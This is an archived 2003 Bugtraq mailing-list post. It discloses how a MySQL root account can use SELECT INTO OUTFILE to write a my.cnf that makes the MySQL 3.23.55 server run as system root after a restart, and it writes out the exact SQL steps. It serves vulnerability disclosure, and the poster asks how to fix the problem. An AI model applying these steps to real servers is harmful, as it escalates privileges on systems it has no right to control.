lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <HBFILP$059523185231EC0339218E0D993ACEAA@libero.it>
Date: Sat,  8 Mar 2003 12:58:37 +0100
From: "bugsman@...ero.it" <bugsman@...ero.it>
To: "bugtraq" <bugtraq@...urityfocus.com>
Subject: MySQL user can be changed to root


Hi. I tried this on my own MySQL 3.23.55 !!!
I found out that logging as the root user, we can change mysqld to run as root instead that i.e. mysql but this works only if there's just one my.cnf file and it is locate in /etc...
Here's how I did it...

I logged in as root and than I did this:

mysql>CREATE DATABASE roottext;
mysql>USE roottext;
mysql>CREATE TABLE hack (conf VARCHAR(80));
mysql>INSERT IN hack VALUES ('[mysqld]');
mysql>INSERT IN hack VALUES ('user=root');
mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack
mysql>QUIT

Doing so we have create a my.cnf in mysql datadir containing:

[mysqld]
user=root

Now, when the mysql server will be restarted, the user option in our datadit my.cnf will override the one in /etc/my.cnf and mysql server will run as root, with all the security flwas that it takes...
This is very dangerous if we think that in mysql <= 3.23.53 it is really easy to get root access due to a bug (an exploit has been released publicly)...
I dunno how this problem can be solved, I'd like to hear from you something...
Thanks.... :)
by
Gufino

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ